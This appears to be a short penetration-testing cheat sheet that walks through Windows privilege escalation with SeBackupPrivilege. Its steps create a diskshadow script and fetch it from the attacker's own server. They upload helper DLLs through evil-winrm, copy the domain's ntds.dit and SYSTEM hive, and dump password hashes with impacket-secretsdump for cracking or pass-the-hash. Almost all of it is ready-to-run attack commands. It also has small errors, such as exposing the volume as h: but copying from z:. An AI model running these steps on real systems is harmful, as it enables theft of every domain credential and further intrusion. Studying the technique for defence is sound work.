Windows PrivEsc with SeBackupPrivilege
Last modified: 2023-02-08
SeBackupPrivilege allows users to retrieve file contents.
Investigation
First check if the current user has SeBackupPrivilege in the privilege information.
whoami /all
If so, we can read any file on the system includes SAML file, SYSTEM registry file.
Exploitation
1. Create a Payload
Create “diskshadow.txt” in local machine. It referes to this.
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:
Then transfer the file into the target machine.
Before that, create “tmp” folder in root in target machine.
mkdir \tmp
cd \tmp
For example, in target machine,
# [Option 1] PowerShell (we need to start web server in local machine)
PS> Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt
# [Option 2] In evil-winrm
PS> upload diskshadow.txt
2. Execute DiskShadow.Exe
Then execute diskshadow.exe.
# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt
3. Upload Malicious DLL
We can download two dll files from here.
# In evil-winrm
PS> upload SeBackupPrivilegeUtils.dll
PS> upload SeBackupPrivilegeCmdLets.dll
PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS> Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite
PS> reg save HKLM\SYSTEM c:\tmp\system
PS> download ntds.dit
PS> download system
4. Dump Password Hashes
Now we have two files (ntds.dit and system) in local machine.
We can dump password hashes using the files.
impacket-secretsdump -ntds ntds.dit -system system LOCAL
After that, crack the hashes or use them for pass-the-hash.